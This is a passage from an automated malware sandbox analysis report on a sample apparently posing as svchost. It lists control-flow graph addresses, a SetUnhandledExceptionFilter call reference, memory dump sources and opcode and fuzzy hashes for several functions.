4000->4007 4009 40135f-401386 call 435e80 4007->4009 4011 40138b-401398 4009->4011 4011->3972 4012 40139e-4013a6 4011->4012 4013 4013b2-4013bd 4012->4013 4014 4013a8-4013ad call 434e04 4012->4014 4014->4013
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 00401223
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2133065306.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: dcd53c9b16003cf5b3d6ef81286d83416c97c5c6dd39a0a7c2031c902ce980c7
                                                  • Instruction ID: 5797e43cdd90b994771c2fa4facc44f94b85f60fc6e77d04d8847e05aa05cae2
                                                  • Opcode Fuzzy Hash: dcd53c9b16003cf5b3d6ef81286d83416c97c5c6dd39a0a7c2031c902ce980c7
                                                  • Instruction Fuzzy Hash: A851AE79A007008FDB14DFA9E88175AB7F0FB89708F11853EE944AB361D738A854CF99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004013C9, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 4017 4013c9-4013dd 4019 4013e3-4013f7 call 434e0c 4017->4019 4020 4011c5-4011cc 4017->4020 4026 4011ea-4011ec 4019->4026 4027 4013fd-40141d call 434dfc 4019->4027 4021 401441-40145f call 434dfc 4020->4021 4022 4011d2-4011e4 4020->4022 4036 401464 4021->4036 4022->4026 4022->4027 4028 4011f2-4011f9 4026->4028 4029 401423-401429 4026->4029 4027->4028 4027->4029 4032 401217-401257 call 4353c0 SetUnhandledExceptionFilter call 434e50 call 435240 call 434e24 4028->4032 4033 4011fb-401214 4028->4033 4029->4028 4048 401271-401277 4032->4048 4049 401259 4032->4049 4033->4032 4040 40146c-40146f call 434dec 4036->4040 4043 401474-40147a 4040->4043 4050 401260-401262 4048->4050 4051 401279-401284 4048->4051 4052 4012b4-4012bc 4049->4052 4054 401290-401292 4050->4054 4055 401264-401267 4050->4055 4053 40126e 4051->4053 4056 4012d2-4012f2 call 434de4 4052->4056 4057 4012be-4012c7 4052->4057 4053->4048 4061 401294 4054->4061 4062 4012a5-4012ad 4054->4062 4055->4054 4063 401269 4055->4063 4056->4036 4067 4012f8-401309 4056->4067 4058 4013c0-4013c4 4057->4058 4059 4012cd 4057->4059 4058->4059 4059->4056 4065 4012af 4061->4065 4062->4065 4066 4012a0-4012a3 4062->4066 4063->4053 4065->4052 4066->4062 4066->4065 4068 401310-401344 call 434dbc call 434de4 call 434dd4 4067->4068 4075 401346-401386 call 434ef0 call 435e80 4068->4075 4079 40138b-401398 4075->4079 4079->4040 4080 40139e-4013a6 4079->4080 4081 4013b2-4013bd 4080->4081 4082 4013a8-4013ad call 434e04 4080->4082 4082->4081
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 00401223
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2133065306.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: 876e0ef929dbb53e3562dd275479b8dbad9e4b4d1d75118838730e5b23ac798c
                                                  • Instruction ID: 987660f846687a77f09716a2d97ca067eee8a792d56564ae2e65df0ec55cb76e
                                                  • Opcode Fuzzy Hash: 876e0ef929dbb53e3562dd275479b8dbad9e4b4d1d75118838730e5b23ac798c
                                                  • Instruction Fuzzy Hash: EE413AB9A047008FDB14EFA5E88179AB7F0FB89308F11843ED98497361D778A854CF5A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004293B0, Relevance: .1, Instructions: 113COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2133065306.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c5d87a72ccccfd3a772a0014e3e51dacc10e76357f72305bb139c42e3191fa53
                                                  • Instruction ID: f32114367b7a43fce08da7f4bf6eed9adcee18824e378ae50fddce3faf8ac97f
                                                  • Opcode Fuzzy Hash: c5d87a72ccccfd3a772a0014e3e51dacc10e76357f72305bb139c42e3191fa53
                                                  • Instruction Fuzzy Hash: 7C4124B06087009FD324DF1AD881B5AFBF5FFC8314F10892EE98A83750D779A8458B5A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions